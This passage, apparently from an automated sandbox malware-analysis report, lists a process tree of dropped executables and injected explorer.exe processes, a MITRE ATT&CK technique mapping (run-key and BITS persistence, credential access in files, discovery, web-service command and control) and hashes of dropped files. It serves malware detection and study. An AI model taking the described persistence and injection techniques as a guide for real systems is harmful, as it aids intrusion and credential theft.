                                                                  • C:\Users\Admin\AppData\Local\Temp\21EC.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\21EC.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:2108
                                                                  • C:\Users\Admin\AppData\Local\Temp\29AE.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\29AE.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:5240
                                                                  • C:\Users\Admin\AppData\Local\Temp\2E14.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\2E14.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:4260
                                                                  • C:\Users\Admin\AppData\Local\Temp\342F.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\342F.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:5300
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                      2⤵
                                                                        PID:5652
                                                                    • C:\Users\Admin\AppData\Local\Temp\3EFE.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\3EFE.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:2804
                                                                    • C:\Users\Admin\AppData\Local\Temp\4141.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\4141.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:5776
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 272
                                                                        2⤵
                                                                        • Program crash
                                                                        PID:1328
                                                                    • C:\Users\Admin\AppData\Local\Temp\4643.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\4643.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:4380
                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                      1⤵
                                                                        PID:5080
                                                                      • C:\Windows\explorer.exe
                                                                        C:\Windows\explorer.exe
                                                                        1⤵
                                                                          PID:6032
                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                          1⤵
                                                                            PID:1820
                                                                          • C:\Windows\explorer.exe
                                                                            C:\Windows\explorer.exe
                                                                            1⤵
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:2052
                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                            1⤵
                                                                              PID:4200
                                                                            • C:\Windows\explorer.exe
                                                                              C:\Windows\explorer.exe
                                                                              1⤵
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:5092
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                              1⤵
                                                                                PID:796
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe
                                                                                1⤵
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:4508
                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                1⤵
                                                                                  PID:6048
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                  1⤵
                                                                                    PID:2508
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                    1⤵
                                                                                      PID:5188
                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                      1⤵
                                                                                        PID:5452
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:3468
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:5432

                                                                                      Network

                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                      Persistence

                                                                                      Registry Run Keys / Startup Folder

                                                                                      1
                                                                                      T1060

                                                                                      BITS Jobs

                                                                                      1
                                                                                      T1197

                                                                                      Defense Evasion

                                                                                      Modify Registry

                                                                                      3
                                                                                      T1112

                                                                                      BITS Jobs

                                                                                      1
                                                                                      T1197

                                                                                      Install Root Certificate

                                                                                      1
                                                                                      T1130

                                                                                      Credential Access

                                                                                      Credentials in Files

                                                                                      3
                                                                                      T1081

                                                                                      Discovery

                                                                                      Software Discovery

                                                                                      1
                                                                                      T1518

                                                                                      Query Registry

                                                                                      4
                                                                                      T1012

                                                                                      System Information Discovery

                                                                                      5
                                                                                      T1082

                                                                                      Security Software Discovery

                                                                                      1
                                                                                      T1063

                                                                                      Peripheral Device Discovery

                                                                                      1
                                                                                      T1120

                                                                                      Remote System Discovery

                                                                                      1
                                                                                      T1018

                                                                                      Collection

                                                                                      Data from Local System

                                                                                      3
                                                                                      T1005

                                                                                      Command and Control

                                                                                      Web Service

                                                                                      1
                                                                                      T1102

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                        MD5

                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                        SHA1

                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                        SHA256

                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                        SHA512

                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                        MD5

                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                        SHA1

                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                        SHA256

                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                        SHA512

                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                      • C:\Program Files\Common Files\DRMRZTJXHS\ultramediaburner.exe
                                                                                        MD5

                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                        SHA1

                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                        SHA256

                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                        SHA512

                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                      • C:\Program Files\Common Files\DRMRZTJXHS\ultramediaburner.exe
                                                                                        MD5

                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                        SHA1

                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                        SHA256

                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                        SHA512

                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                      • C:\Program Files\install.dat
                                                                                        MD5

                                                                                        31e4a5735b20be6a53cbb552663b1cc3

                                                                                        SHA1

                                                                                        c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                        SHA256

                                                                                        b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                        SHA512

                                                                                        3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                      • C:\Program Files\install.dll
                                                                                        MD5

                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                        SHA1

                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                        SHA256

                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                        SHA512

                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                        MD5

                                                                                        e71a0a7e48b10bde0a9c54387762f33e

                                                                                        SHA1

                                                                                        fed75947f1163b00096e24a46e67d9c21e7eeebd

                                                                                        SHA256

                                                                                        83d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de

                                                                                        SHA512

                                                                                        394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                        MD5

                                                                                        4e30d47a8da4117d7baa88054794637f

                                                                                        SHA1

                                                                                        04a6acbd1408842699347a51bf1bbd43a2e91de2

                                                                                        SHA256

                                                                                        a76e78d615a7e19fd137c065b3d8709a2eba80d38a2b7857c343429bb8ad23ab

                                                                                        SHA512

                                                                                        fc7b1e2eb8458430f94ac4e2c59d134af696f6ed25b57cb2ab818bdced8d5e87466c48cf8e63e5b0537329c5168905f2b43423310ff7aa408e59a98101c8cf36

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                        MD5

                                                                                        177cd7e15634b9c8bd5359b7afce2fe2

                                                                                        SHA1

                                                                                        74bd7d3e4bc70b604a764fb3a0aeaac02e98af01

                                                                                        SHA256

                                                                                        ffe1cda5f708b4f948c4bb61a1bd080c751be2dfdd6deddcbb3d0be17091e434

                                                                                        SHA512

                                                                                        570d689daa76516f4ca11b51df4e16c8622d0e8a51aacdf55e00230f6d797d1dda5e7911d7f70dd779248856769229ccf4471dd9743579d72465cac150311085

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                        MD5

                                                                                        43b0f4b03aaf40d08cb010f9b6ce9fd4

                                                                                        SHA1

                                                                                        0b41cd0c438423029781505f37c4f5c1ded33626

                                                                                        SHA256

                                                                                        293c662dc5f9a5a7bef81be5377ed569ea1f0f8137dd3c13b7c862f1a794174c

                                                                                        SHA512

                                                                                        daf16668f387d8c99832b5b538572467907c403dd6f9c58640737ee609920338cfb652f9f821139fbd5650ea305ca8caf6b09e9043e4d3879feca26d9cdc4c43

                                                                                      • C:\Users\Admin\AppData\Local\Temp\3b-afee4-f6b-acb82-75f41a310aedd\Jikejaeshupi.exe
                                                                                        MD5

                                                                                        2e91d25073151415f8c39de2262cbba8

                                                                                        SHA1

                                                                                        32544481a34273a1a870822152d201ea9c19b34d

                                                                                        SHA256

                                                                                        0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                        SHA512

                                                                                        306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                      • C:\Users\Admin\AppData\Local\Temp\3b-afee4-f6b-acb82-75f41a310aedd\Jikejaeshupi.exe
                                                                                        MD5

                                                                                        2e91d25073151415f8c39de2262cbba8

                                                                                        SHA1

                                                                                        32544481a34273a1a870822152d201ea9c19b34d

                                                                                        SHA256

                                                                                        0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                        SHA512

                                                                                        306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                      • C:\Users\Admin\AppData\Local\Temp\3b-afee4-f6b-acb82-75f41a310aedd\Jikejaeshupi.exe.config
                                                                                        MD5

                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                        SHA1

                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                        SHA256

                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                        SHA512

                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                      • C:\Users\Admin\AppData\Local\Temp\3b-afee4-f6b-acb82-75f41a310aedd\Kenessey.txt
                                                                                        MD5

                                                                                        97384261b8bbf966df16e5ad509922db

                                                                                        SHA1

                                                                                        2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                        SHA256

                                                                                        9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                        SHA512

                                                                                        b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                      • C:\Users\Admin\AppData\Local\Temp\40yxuyxd.y55\md1_1eaf.exe
                                                                                        MD5

                                                                                        25d9f83dc738b4894cf159c6a9754e40

                                                                                        SHA1

                                                                                        152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                        SHA256

                                                                                        8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                        SHA512

                                                                                        41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                      • C:\Users\Admin\AppData\Local\Temp\40yxuyxd.y55\md1_1eaf.exe
                                                                                        MD5

                                                                                        25d9f83dc738b4894cf159c6a9754e40

                                                                                        SHA1

                                                                                        152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                        SHA256

                                                                                        8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                        SHA512

                                                                                        41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                      • C:\Users\Admin\AppData\Local\Temp\6a-4a51a-ec2-839ba-84db2d32ac855\Qezhaefitovi.exe
                                                                                        MD5

                                                                                        18e49540637bccc9b3a7ca3d48cae223

                                                                                        SHA1

                                                                                        b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                        SHA256

                                                                                        698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                        SHA512

                                                                                        a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                      • C:\Users\Admin\AppData\Local\Temp\6a-4a51a-ec2-839ba-84db2d32ac855\Qezhaefitovi.exe
                                                                                        MD5

                                                                                        18e49540637bccc9b3a7ca3d48cae223

                                                                                        SHA1

                                                                                        b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                        SHA256

                                                                                        698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                        SHA512

                                                                                        a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                      • C:\Users\Admin\AppData\Local\Temp\6a-4a51a-ec2-839ba-84db2d32ac855\Qezhaefitovi.exe.config
                                                                                        MD5

                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                        SHA1

                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                        SHA256

                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                        SHA512

                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                      • C:\Users\Admin\AppData\Local\Temp\EVd2wNLPfH.exe
                                                                                        MD5

                                                                                        dac476eb95c28c5cc52eabaf262ac97d

                                                                                        SHA1

                                                                                        b8f879f009decfa380dca47e24ce875f5a805d23

                                                                                        SHA256

                                                                                        4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                                        SHA512

                                                                                        276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

                                                                                      • C:\Users\Admin\AppData\Local\Temp\EVd2wNLPfH.exe
                                                                                        MD5

                                                                                        dac476eb95c28c5cc52eabaf262ac97d

                                                                                        SHA1

                                                                                        b8f879f009decfa380dca47e24ce875f5a805d23

                                                                                        SHA256

                                                                                        4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                                        SHA512

                                                                                        276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

                                                                                      • C:\Users\Admin\AppData\Local\Temp\bur5qrt4.inc\instEU.exe
                                                                                        MD5

                                                                                        bdb62dc3502ea91f26181fa451bd0878

                                                                                        SHA1

                                                                                        bff5609cd44209ee1f07920b2103757792866d7a

                                                                                        SHA256

                                                                                        6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                        SHA512

                                                                                        12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                      • C:\Users\Admin\AppData\Local\Temp\bur5qrt4.inc\instEU.exe
                                                                                        MD5

                                                                                        bdb62dc3502ea91f26181fa451bd0878

                                                                                        SHA1

                                                                                        bff5609cd44209ee1f07920b2103757792866d7a

                                                                                        SHA256

                                                                                        6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                        SHA512

                                                                                        12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                      • C:\Users\Admin\AppData\Local\Temp\f0ds3afe.qyz\c7ae36fa.exe
                                                                                        MD5

                                                                                        6a4b96d0e5cb5b61943287c153b0e0b0

                                                                                        SHA1

                                                                                        5ce8b0eb0591db05caad82a3b9a1841b5c2bcc98

                                                                                        SHA256

                                                                                        b5ff3ac37a2ca84de829d8eceda2a47075839fef767e89b004856c5d0a239b31

                                                                                        SHA512

                                                                                        d29b7aba6ecb7ac92648e441aed9782069327b134508e8c62d5585841d9454babc33e29963b8a781d1e8df5570e3e7589706eac30c1f784ae6fae1e4ced73522

                                                                                      • C:\Users\Admin\AppData\Local\Temp\f0ds3afe.qyz\c7ae36fa.exe
                                                                                        MD5

                                                                                        6a4b96d0e5cb5b61943287c153b0e0b0

                                                                                        SHA1

                                                                                        5ce8b0eb0591db05caad82a3b9a1841b5c2bcc98

                                                                                        SHA256

                                                                                        b5ff3ac37a2ca84de829d8eceda2a47075839fef767e89b004856c5d0a239b31

                                                                                        SHA512

                                                                                        d29b7aba6ecb7ac92648e441aed9782069327b134508e8c62d5585841d9454babc33e29963b8a781d1e8df5570e3e7589706eac30c1f784ae6fae1e4ced73522

                                                                                      • C:\Users\Admin\AppData\Local\Temp\hsybhhno.ynq\SunLabsPlayer.exe
                                                                                        MD5

                                                                                        e470448fc4595fa70a5d19fcbeb4f741

                                                                                        SHA1

                                                                                        3b8c1f9047a41c8ebff25e8df92da252315bcea5

                                                                                        SHA256

                                                                                        d562a7c5bb2e2488476c48c19ffec46b9b65dad6066855e0f7fd115b879b7955

                                                                                        SHA512

                                                                                        ec006b744b187290f9245edc8ddf17e5a75ec7783862e3741ec32f955070a7721edbee60779b4b817c6b487aab97a0412d276f8c18d058b01e02b7dda97dad86

                                                                                      • C:\Users\Admin\AppData\Local\Temp\hsybhhno.ynq\SunLabsPlayer.exe
                                                                                        MD5

                                                                                        e470448fc4595fa70a5d19fcbeb4f741

                                                                                        SHA1

                                                                                        3b8c1f9047a41c8ebff25e8df92da252315bcea5

                                                                                        SHA256

                                                                                        d562a7c5bb2e2488476c48c19ffec46b9b65dad6066855e0f7fd115b879b7955

                                                                                        SHA512

                                                                                        ec006b744b187290f9245edc8ddf17e5a75ec7783862e3741ec32f955070a7721edbee60779b4b817c6b487aab97a0412d276f8c18d058b01e02b7dda97dad86

                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-394M7.tmp\Ultra.exe
                                                                                        MD5

                                                                                        cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                        SHA1

                                                                                        ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                        SHA256

                                                                                        0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                        SHA512

                                                                                        49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-394M7.tmp\Ultra.exe
                                                                                        MD5

                                                                                        cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                        SHA1

                                                                                        ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                        SHA256

                                                                                        0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                        SHA512

                                                                                        49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-6P68Q.tmp\ultramediaburner.tmp
                                                                                        MD5

                                                                                        4e8c7308803ce36c8c2c6759a504c908

                                                                                        SHA1

                                                                                        a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                        SHA256

                                                                                        90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                        SHA512

                                                                                        780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-6P68Q.tmp\ultramediaburner.tmp
                                                                                        MD5

                                                                                        4e8c7308803ce36c8c2c6759a504c908

                                                                                        SHA1

                                                                                        a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                        SHA256

                                                                                        90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                        SHA512

                                                                                        780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-BB27I.tmp\Install.tmp
                                                                                        MD5

                                                                                        45ca138d0bb665df6e4bef2add68c7bf

                                                                                        SHA1

                                                                                        12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                        SHA256

                                                                                        3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                        SHA512

                                                                                        cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                      • C:\Users\Admin\AppData\Local\Temp\msxu3ixg.r4q\inst.exe
                                                                                        MD5

                                                                                        edd1b348e495cb2287e7a86c8070898d

                                                                                        SHA1

                                                                                        682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                        SHA256

                                                                                        eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                        SHA512

                                                                                        613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                      • C:\Users\Admin\AppData\Local\Temp\msxu3ixg.r4q\inst.exe
                                                                                        MD5

                                                                                        edd1b348e495cb2287e7a86c8070898d

                                                                                        SHA1

                                                                                        682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                        SHA256

                                                                                        eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                        SHA512

                                                                                        613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1
                                                                                        MD5

                                                                                        71e5795ca945d491ca5980bbba31c277

                                                                                        SHA1

                                                                                        c33cd8b3854637bb602f54dfc0fca24d71ca2f82

                                                                                        SHA256

                                                                                        fd691567c181efe49969737247ae8052278b294d54f5905478f9477d4c76ab2f

                                                                                        SHA512

                                                                                        f8404c4c609f82f91ad144bc0dd0c7d66e70393f6eab3af55d88969adc141e054c6de117396067ae2bc058e494453d346cd8ed595d7646dfddbb54f8d24f415a

                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1
                                                                                        MD5

                                                                                        22d6ff2aa8423bbdccf162adcb9e6b2b

                                                                                        SHA1

                                                                                        528d8a516b181b03c425ab2a76ef3c3437885ae6

                                                                                        SHA256

                                                                                        f35aeb2952ffdef659754d039c46197a1a7515f4267148698cf10c8a577a8b2e

                                                                                        SHA512

                                                                                        1fe67ccb9bd3d488ec3a7a1ff676d29d904b5cd675f35c80f7a52b68f7d7f6e9ec20fcbbd04115a8ffa86c3121e10037126f0af28bdbf7b7f8fbcd972765e65b

                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1
                                                                                        MD5

                                                                                        7e7a7312423953e5486a4012a77b7ae4

                                                                                        SHA1

                                                                                        ec8ddd4b577c2e5fa9e8bcc47a148c7f491bab53

                                                                                        SHA256

                                                                                        954a3e3ed9171d8fc1c2a52ca9811733edcacb25cb03545e28ebb0457f0e1c9d

                                                                                        SHA512

                                                                                        209582d33265cce3318ae6da5ed38ece94219551ac57166752cdce12c4c35ac834a607a879fa6d215c1440350455a27e27d5ee6bfc2ffd33081e3b3cdb324257

                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsg6208.tmp\tempfile.ps1
                                                                                        MD5

                                                                                        8fdce8a3774e1f7ed61d8299adee3edd

                                                                                        SHA1

                                                                                        309d0f30bebac97e6fbc270f6186082f430d6231

                                                                                        SHA256

                                                                                        afdd9a253a5a96702951c7d00089ae04eb1eb9933699abf097a7d751e34fddee

                                                                                        SHA512

                                                                                        d66dcba0d16964abf7097b1ab25323025493f49b1da7031c359ab087ca9bca2a6b6f2901b9491c2d7a52f37958fc6f522e143ce950d024628156db002810af19

                                                                                      • C:\Users\Admin\AppData\Local\Temp\t3ocab2b.1rf\GcleanerWW.exe
                                                                                        MD5

                                                                                        4f4adcbf8c6f66dcfc8a3282ac2bf10a

                                                                                        SHA1

                                                                                        c35a9fc52bb556c79f8fa540df587a2bf465b940

                                                                                        SHA256

                                                                                        6b3c238ebcf1f3c07cf0e556faa82c6b8fe96840ff4b6b7e9962a2d855843a0b

                                                                                        SHA512

                                                                                        0d15d65c1a988dfc8cc58f515a9bb56cbaf1ff5cb0a5554700bc9af20a26c0470a83c8eb46e16175154a6bcaad7e280bbfd837a768f9f094da770b7bd3849f88

                                                                                      • C:\Users\Admin\AppData\Local\Temp\udwkobsk.pbv\toolspab1.exe
                                                                                        MD5

                                                                                        a37d7897dd42f21607bc8f28c074376e

                                                                                        SHA1

                                                                                        2d85f1b21e2556ff5b932e60db8bd70fbdebe081

                                                                                        SHA256

                                                                                        3bee3d512c7bb01aa88ea7fcfecf4e250747958d95db1137d3fe804299a75f6c

                                                                                        SHA512

                                                                                        abe65a6f1c7c3dff7be51ada75c6bfcec49f09a94dc3693e5f957e5d728373050cb5b868cbbb49c179988dc8e724769221c7658818460ea22ddd0ef35f09adf2

                                                                                      • C:\Users\Admin\AppData\Local\Temp\udwkobsk.pbv\toolspab1.exe
                                                                                        MD5

                                                                                        a37d7897dd42f21607bc8f28c074376e

                                                                                        SHA1

                                                                                        2d85f1b21e2556ff5b932e60db8bd70fbdebe081

                                                                                        SHA256

                                                                                        3bee3d512c7bb01aa88ea7fcfecf4e250747958d95db1137d3fe804299a75f6c

                                                                                        SHA512

